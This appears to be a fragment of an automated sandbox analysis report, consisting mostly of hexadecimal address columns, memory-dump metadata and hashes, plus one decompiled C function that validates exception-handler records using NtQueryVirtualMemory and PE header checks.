                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b3df
                                                                                                                                                                                                                                          0x0112b3e6
                                                                                                                                                                                                                                          0x0112b412
                                                                                                                                                                                                                                          0x0112b412
                                                                                                                                                                                                                                          0x0112b414
                                                                                                                                                                                                                                          0x0112b416
                                                                                                                                                                                                                                          0x0112b42a
                                                                                                                                                                                                                                          0x0112b42c
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b418
                                                                                                                                                                                                                                          0x0112b418
                                                                                                                                                                                                                                          0x0112b418
                                                                                                                                                                                                                                          0x0112b421
                                                                                                                                                                                                                                          0x0112b422
                                                                                                                                                                                                                                          0x0112b424
                                                                                                                                                                                                                                          0x0112b426
                                                                                                                                                                                                                                          0x0112b426
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b418
                                                                                                                                                                                                                                          0x0112b3e8
                                                                                                                                                                                                                                          0x0112b3e8
                                                                                                                                                                                                                                          0x0112b3eb
                                                                                                                                                                                                                                          0x0112b3ed
                                                                                                                                                                                                                                          0x0112b3ff
                                                                                                                                                                                                                                          0x0112b3ff
                                                                                                                                                                                                                                          0x0112b402
                                                                                                                                                                                                                                          0x0112b404
                                                                                                                                                                                                                                          0x0112b404
                                                                                                                                                                                                                                          0x0112b405
                                                                                                                                                                                                                                          0x0112b405
                                                                                                                                                                                                                                          0x0112b40b
                                                                                                                                                                                                                                          0x0112b40b
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b3ef
                                                                                                                                                                                                                                          0x0112b3ef
                                                                                                                                                                                                                                          0x0112b3ef
                                                                                                                                                                                                                                          0x0112b3f6
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b3f8
                                                                                                                                                                                                                                          0x0112b3f8
                                                                                                                                                                                                                                          0x0112b3f9
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b3f9
                                                                                                                                                                                                                                          0x0112b3fb
                                                                                                                                                                                                                                          0x0112b3fd
                                                                                                                                                                                                                                          0x0112b410
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b410
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b3fd
                                                                                                                                                                                                                                          0x0112b36f
                                                                                                                                                                                                                                          0x0112b372
                                                                                                                                                                                                                                          0x0112b375
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b377
                                                                                                                                                                                                                                          0x0112b379
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112b379
                                                                                                                                                                                                                                          0x0112b33e
                                                                                                                                                                                                                                          0x0112b340
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 0112B3AE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2850889275-0
                                                                                                                                                                                                                                          • Opcode ID: e8a47098e3e08be1c93d1417ac67451586b62433459bd2f3f0749ea8151302f1
                                                                                                                                                                                                                                          • Instruction ID: 501e0095920ebd71f1c142c339c6cd8322bee5c2f31465bf98e1ca0d5eb1df4a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8a47098e3e08be1c93d1417ac67451586b62433459bd2f3f0749ea8151302f1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D61D331A1C6729FDB3ECE2CD4D062977A1EB85324F248439DD16CB295E730D8A2C758
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                          			E004023F5(long _a4) {
                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                          				short* _v32;
                                                                                                                                                                                                                                          				void _v36;
                                                                                                                                                                                                                                          				void* _t57;
                                                                                                                                                                                                                                          				signed int _t58;
                                                                                                                                                                                                                                          				signed int _t61;
                                                                                                                                                                                                                                          				signed int _t62;
                                                                                                                                                                                                                                          				void* _t63;
                                                                                                                                                                                                                                          				signed int* _t68;
                                                                                                                                                                                                                                          				intOrPtr* _t69;
                                                                                                                                                                                                                                          				intOrPtr* _t71;
                                                                                                                                                                                                                                          				intOrPtr _t72;
                                                                                                                                                                                                                                          				intOrPtr _t75;
                                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                                          				signed int _t77;
                                                                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                                                                          				void _t80;
                                                                                                                                                                                                                                          				signed int _t81;
                                                                                                                                                                                                                                          				signed int _t84;
                                                                                                                                                                                                                                          				signed int _t86;
                                                                                                                                                                                                                                          				short* _t87;
                                                                                                                                                                                                                                          				void* _t89;
                                                                                                                                                                                                                                          				signed int* _t90;
                                                                                                                                                                                                                                          				long _t91;
                                                                                                                                                                                                                                          				signed int _t93;
                                                                                                                                                                                                                                          				signed int _t94;
                                                                                                                                                                                                                                          				signed int _t100;
                                                                                                                                                                                                                                          				signed int _t102;
                                                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                                                          				long _t108;
                                                                                                                                                                                                                                          				signed int _t110;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t108 = _a4;
                                                                                                                                                                                                                                          				_t76 =  *(_t108 + 8);
                                                                                                                                                                                                                                          				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_a4 =  *[fs:0x4];
                                                                                                                                                                                                                                          				_v8 =  *[fs:0x8];
                                                                                                                                                                                                                                          				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                                                                          					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                                                                          					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                                                                          					if(_t102 != 0xffffffff) {
                                                                                                                                                                                                                                          						_t91 = 0;
                                                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                                                          						_a4 = 0;
                                                                                                                                                                                                                                          						_t57 = _t76;
                                                                                                                                                                                                                                          						do {
                                                                                                                                                                                                                                          							_t80 =  *_t57;
                                                                                                                                                                                                                                          							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                                                          							if(_t80 == 0xffffffff) {
                                                                                                                                                                                                                                          								goto L9;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							__eflags = _t80 - _t91;
                                                                                                                                                                                                                                          							if(_t80 >= _t91) {
                                                                                                                                                                                                                                          								L20:
                                                                                                                                                                                                                                          								_t63 = 0;
                                                                                                                                                                                                                                          								L60:
                                                                                                                                                                                                                                          								return _t63;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							L9:
                                                                                                                                                                                                                                          							__eflags =  *(_t57 + 4);
                                                                                                                                                                                                                                          							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                                                                          								_t12 =  &_a4;
                                                                                                                                                                                                                                          								 *_t12 = _a4 + 1;
                                                                                                                                                                                                                                          								__eflags =  *_t12;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							_t91 = _t91 + 1;
                                                                                                                                                                                                                                          							_t57 = _t57 + 0xc;
                                                                                                                                                                                                                                          							__eflags = _t91 - _t102;
                                                                                                                                                                                                                                          						} while (_t91 <= _t102);
                                                                                                                                                                                                                                          						__eflags = _a4;
                                                                                                                                                                                                                                          						if(_a4 == 0) {
                                                                                                                                                                                                                                          							L15:
                                                                                                                                                                                                                                          							_t81 =  *0x404178;
                                                                                                                                                                                                                                          							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                                                                          							_t58 = 0;
                                                                                                                                                                                                                                          							__eflags = _t81;
                                                                                                                                                                                                                                          							if(_t81 <= 0) {
                                                                                                                                                                                                                                          								L18:
                                                                                                                                                                                                                                          								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                                                                          								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                                                                          								__eflags = _t61;
                                                                                                                                                                                                                                          								if(_t61 < 0) {
                                                                                                                                                                                                                                          									_t62 = 0;
                                                                                                                                                                                                                                          									__eflags = 0;
                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                          									_t62 = _a4;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								__eflags = _t62;
                                                                                                                                                                                                                                          								if(_t62 == 0) {
                                                                                                                                                                                                                                          									L59:
                                                                                                                                                                                                                                          									_t63 = _t104;
                                                                                                                                                                                                                                          									goto L60;
                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                          									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                                                                          									if(_v12 != 0x1000000) {
                                                                                                                                                                                                                                          										goto L59;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                                                                          									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                                                                          										L46:
                                                                                                                                                                                                                                          										_t63 = 1;
                                                                                                                                                                                                                                          										 *0x4041c0 = 1;
                                                                                                                                                                                                                                          										__eflags =  *0x4041c0;
                                                                                                                                                                                                                                          										if( *0x4041c0 != 0) {
                                                                                                                                                                                                                                          											goto L60;
                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                          										_t84 =  *0x404178;
                                                                                                                                                                                                                                          										__eflags = _t84;
                                                                                                                                                                                                                                          										_t93 = _t84;
                                                                                                                                                                                                                                          										if(_t84 <= 0) {
                                                                                                                                                                                                                                          											L51:
                                                                                                                                                                                                                                          											__eflags = _t93;
                                                                                                                                                                                                                                          											if(_t93 != 0) {
                                                                                                                                                                                                                                          												L58:
                                                                                                                                                                                                                                          												 *0x4041c0 = 0;
                                                                                                                                                                                                                                          												goto L5;
                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                          											_t77 = 0xf;
                                                                                                                                                                                                                                          											__eflags = _t84 - _t77;
                                                                                                                                                                                                                                          											if(_t84 <= _t77) {
                                                                                                                                                                                                                                          												_t77 = _t84;
                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                          											_t94 = 0;
                                                                                                                                                                                                                                          											__eflags = _t77;
                                                                                                                                                                                                                                          											if(_t77 < 0) {
                                                                                                                                                                                                                                          												L56:
                                                                                                                                                                                                                                          												__eflags = _t84 - 0x10;
                                                                                                                                                                                                                                          												if(_t84 < 0x10) {
                                                                                                                                                                                                                                          													_t86 = _t84 + 1;
                                                                                                                                                                                                                                          													__eflags = _t86;
                                                                                                                                                                                                                                          													 *0x404178 = _t86;
                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                          												goto L58;
                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                          												do {
                                                                                                                                                                                                                                          													_t68 = 0x404180 + _t94 * 4;
                                                                                                                                                                                                                                          													_t94 = _t94 + 1;
                                                                                                                                                                                                                                          													__eflags = _t94 - _t77;
                                                                                                                                                                                                                                          													 *_t68 = _t110;
                                                                                                                                                                                                                                          													_t110 =  *_t68;
                                                                                                                                                                                                                                          												} while (_t94 <= _t77);
                                                                                                                                                                                                                                          												goto L56;
                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                          										_t69 = 0x40417c + _t84 * 4;
                                                                                                                                                                                                                                          										while(1) {
                                                                                                                                                                                                                                          											__eflags =  *_t69 - _t110;
                                                                                                                                                                                                                                          											if( *_t69 == _t110) {
                                                                                                                                                                                                                                          												goto L51;
                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                          											_t93 = _t93 - 1;
                                                                                                                                                                                                                                          											_t69 = _t69 - 4;
                                                                                                                                                                                                                                          											__eflags = _t93;
                                                                                                                                                                                                                                          											if(_t93 > 0) {
                                                                                                                                                                                                                                          												continue;
                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                          											goto L51;
                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                          										goto L51;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									_t87 = _v32;
                                                                                                                                                                                                                                          									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                                                                          									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                                                                          										goto L59;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                                                                          									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                                                                          									if( *_t71 != 0x4550) {
                                                                                                                                                                                                                                          										goto L59;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                                                                          									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                                                                          										goto L59;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									_t78 = _t76 - _t87;
                                                                                                                                                                                                                                          									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                                                                          									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                                                                          									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                                                                          										goto L59;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                                                                          									__eflags = _t78 - _t72;
                                                                                                                                                                                                                                          									if(_t78 < _t72) {
                                                                                                                                                                                                                                          										goto L46;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                                                                          									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                                                                          										goto L46;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                                                                          									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                                                                          										goto L20;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									goto L46;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                          								goto L16;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                          								L16:
                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                          								if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								_t58 = _t58 + 1;
                                                                                                                                                                                                                                          								__eflags = _t58 - _t81;
                                                                                                                                                                                                                                          								if(_t58 < _t81) {
                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								goto L18;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							__eflags = _t58;
                                                                                                                                                                                                                                          							if(_t58 <= 0) {
                                                                                                                                                                                                                                          								goto L5;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							 *0x4041c0 = 1;
                                                                                                                                                                                                                                          							__eflags =  *0x4041c0;
                                                                                                                                                                                                                                          							if( *0x4041c0 != 0) {
                                                                                                                                                                                                                                          								goto L5;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                          							if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                          								L32:
                                                                                                                                                                                                                                          								_t100 = 0;
                                                                                                                                                                                                                                          								__eflags = _t58;
                                                                                                                                                                                                                                          								if(_t58 < 0) {
                                                                                                                                                                                                                                          									L34:
                                                                                                                                                                                                                                          									 *0x4041c0 = 0;
                                                                                                                                                                                                                                          									goto L5;
                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                          									goto L33;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								do {
                                                                                                                                                                                                                                          									L33:
                                                                                                                                                                                                                                          									_t90 = 0x404180 + _t100 * 4;
                                                                                                                                                                                                                                          									_t100 = _t100 + 1;
                                                                                                                                                                                                                                          									__eflags = _t100 - _t58;
                                                                                                                                                                                                                                          									 *_t90 = _t110;
                                                                                                                                                                                                                                          									_t110 =  *_t90;
                                                                                                                                                                                                                                          								} while (_t100 <= _t58);
                                                                                                                                                                                                                                          								goto L34;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							_t58 = _t81 - 1;
                                                                                                                                                                                                                                          							__eflags = _t58;
                                                                                                                                                                                                                                          							if(_t58 < 0) {
                                                                                                                                                                                                                                          								L28:
                                                                                                                                                                                                                                          								__eflags = _t81 - 0x10;
                                                                                                                                                                                                                                          								if(_t81 < 0x10) {
                                                                                                                                                                                                                                          									_t81 = _t81 + 1;
                                                                                                                                                                                                                                          									__eflags = _t81;
                                                                                                                                                                                                                                          									 *0x404178 = _t81;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								_t58 = _t81 - 1;
                                                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                          								goto L25;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                          								L25:
                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                          								if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								_t58 = _t58 - 1;
                                                                                                                                                                                                                                          								__eflags = _t58;
                                                                                                                                                                                                                                          								if(_t58 >= 0) {
                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							__eflags = _t58;
                                                                                                                                                                                                                                          							if(__eflags >= 0) {
                                                                                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                                                                                          									goto L34;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							goto L28;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                                                                          						__eflags = _t75 - _v8;
                                                                                                                                                                                                                                          						if(_t75 < _v8) {
                                                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						__eflags = _t75 - _t108;
                                                                                                                                                                                                                                          						if(_t75 >= _t108) {
                                                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						goto L15;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                                          					_t63 = 1;
                                                                                                                                                                                                                                          					goto L60;
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					goto L3;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          			}




































                                                                                                                                                                                                                                          0x004023ff
                                                                                                                                                                                                                                          0x00402402
                                                                                                                                                                                                                                          0x00402408
                                                                                                                                                                                                                                          0x00402426
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402426
                                                                                                                                                                                                                                          0x00402410
                                                                                                                                                                                                                                          0x00402419
                                                                                                                                                                                                                                          0x0040241f
                                                                                                                                                                                                                                          0x0040242e
                                                                                                                                                                                                                                          0x00402431
                                                                                                                                                                                                                                          0x00402434
                                                                                                                                                                                                                                          0x0040243e
                                                                                                                                                                                                                                          0x0040243e
                                                                                                                                                                                                                                          0x00402440
                                                                                                                                                                                                                                          0x00402443
                                                                                                                                                                                                                                          0x00402445
                                                                                                                                                                                                                                          0x00402445
                                                                                                                                                                                                                                          0x00402447
                                                                                                                                                                                                                                          0x0040244a
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0040244c
                                                                                                                                                                                                                                          0x0040244e
                                                                                                                                                                                                                                          0x004024b4
                                                                                                                                                                                                                                          0x004024b4
                                                                                                                                                                                                                                          0x00402612
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402612
                                                                                                                                                                                                                                          0x00402450
                                                                                                                                                                                                                                          0x00402450
                                                                                                                                                                                                                                          0x00402454
                                                                                                                                                                                                                                          0x00402456
                                                                                                                                                                                                                                          0x00402456
                                                                                                                                                                                                                                          0x00402456
                                                                                                                                                                                                                                          0x00402456
                                                                                                                                                                                                                                          0x00402459
                                                                                                                                                                                                                                          0x0040245a
                                                                                                                                                                                                                                          0x0040245d
                                                                                                                                                                                                                                          0x0040245d
                                                                                                                                                                                                                                          0x00402461
                                                                                                                                                                                                                                          0x00402465
                                                                                                                                                                                                                                          0x00402473
                                                                                                                                                                                                                                          0x00402473
                                                                                                                                                                                                                                          0x0040247b
                                                                                                                                                                                                                                          0x00402481
                                                                                                                                                                                                                                          0x00402483
                                                                                                                                                                                                                                          0x00402485
                                                                                                                                                                                                                                          0x00402495
                                                                                                                                                                                                                                          0x004024a2
                                                                                                                                                                                                                                          0x004024a6
                                                                                                                                                                                                                                          0x004024ab
                                                                                                                                                                                                                                          0x004024ad
                                                                                                                                                                                                                                          0x0040252b
                                                                                                                                                                                                                                          0x0040252b
                                                                                                                                                                                                                                          0x004024af
                                                                                                                                                                                                                                          0x004024af
                                                                                                                                                                                                                                          0x004024af
                                                                                                                                                                                                                                          0x0040252d
                                                                                                                                                                                                                                          0x0040252f
                                                                                                                                                                                                                                          0x00402610
                                                                                                                                                                                                                                          0x00402610
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402535
                                                                                                                                                                                                                                          0x00402535
                                                                                                                                                                                                                                          0x0040253c
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402542
                                                                                                                                                                                                                                          0x00402546
                                                                                                                                                                                                                                          0x004025a2
                                                                                                                                                                                                                                          0x004025a4
                                                                                                                                                                                                                                          0x004025ac
                                                                                                                                                                                                                                          0x004025ae
                                                                                                                                                                                                                                          0x004025b0
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004025b2
                                                                                                                                                                                                                                          0x004025b8
                                                                                                                                                                                                                                          0x004025ba
                                                                                                                                                                                                                                          0x004025bc
                                                                                                                                                                                                                                          0x004025d1
                                                                                                                                                                                                                                          0x004025d1
                                                                                                                                                                                                                                          0x004025d3
                                                                                                                                                                                                                                          0x00402602
                                                                                                                                                                                                                                          0x00402609
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402609
                                                                                                                                                                                                                                          0x004025d7
                                                                                                                                                                                                                                          0x004025d8
                                                                                                                                                                                                                                          0x004025da
                                                                                                                                                                                                                                          0x004025dc
                                                                                                                                                                                                                                          0x004025dc
                                                                                                                                                                                                                                          0x004025de
                                                                                                                                                                                                                                          0x004025e0
                                                                                                                                                                                                                                          0x004025e2
                                                                                                                                                                                                                                          0x004025f6
                                                                                                                                                                                                                                          0x004025f6
                                                                                                                                                                                                                                          0x004025f9
                                                                                                                                                                                                                                          0x004025fb
                                                                                                                                                                                                                                          0x004025fb
                                                                                                                                                                                                                                          0x004025fc
                                                                                                                                                                                                                                          0x004025fc
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004025e4
                                                                                                                                                                                                                                          0x004025e4
                                                                                                                                                                                                                                          0x004025e4
                                                                                                                                                                                                                                          0x004025ed
                                                                                                                                                                                                                                          0x004025ee
                                                                                                                                                                                                                                          0x004025f0
                                                                                                                                                                                                                                          0x004025f2
                                                                                                                                                                                                                                          0x004025f2
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004025e4
                                                                                                                                                                                                                                          0x004025e2
                                                                                                                                                                                                                                          0x004025be
                                                                                                                                                                                                                                          0x004025c5
                                                                                                                                                                                                                                          0x004025c5
                                                                                                                                                                                                                                          0x004025c7
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004025c9
                                                                                                                                                                                                                                          0x004025ca
                                                                                                                                                                                                                                          0x004025cd
                                                                                                                                                                                                                                          0x004025cf
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004025cf
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004025c5
                                                                                                                                                                                                                                          0x00402548
                                                                                                                                                                                                                                          0x0040254b
                                                                                                                                                                                                                                          0x00402550
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402559
                                                                                                                                                                                                                                          0x0040255b
                                                                                                                                                                                                                                          0x00402561
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402567
                                                                                                                                                                                                                                          0x0040256d
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402573
                                                                                                                                                                                                                                          0x00402575
                                                                                                                                                                                                                                          0x0040257e
                                                                                                                                                                                                                                          0x00402582
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402588
                                                                                                                                                                                                                                          0x0040258b
                                                                                                                                                                                                                                          0x0040258d
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402594
                                                                                                                                                                                                                                          0x00402596
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402598
                                                                                                                                                                                                                                          0x0040259c
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0040259c
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402487
                                                                                                                                                                                                                                          0x00402487
                                                                                                                                                                                                                                          0x00402487
                                                                                                                                                                                                                                          0x0040248e
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402490
                                                                                                                                                                                                                                          0x00402491
                                                                                                                                                                                                                                          0x00402493
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00402493
                                                                                                                                                                                                                                          0x004024bb
                                                                                                                                                                                                                                          0x004024bd
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004024cd
                                                                                                                                                                                                                                          0x004024cf
                                                                                                                                                                                                                                          0x004024d1
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004024d7
                                                                                                                                                                                                                                          0x004024de
                                                                                                                                                                                                                                          0x0040250a
                                                                                                                                                                                                                                          0x0040250a
                                                                                                                                                                                                                                          0x0040250c
                                                                                                                                                                                                                                          0x0040250e
                                                                                                                                                                                                                                          0x00402522
                                                                                                                                                                                                                                          0x00402524
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
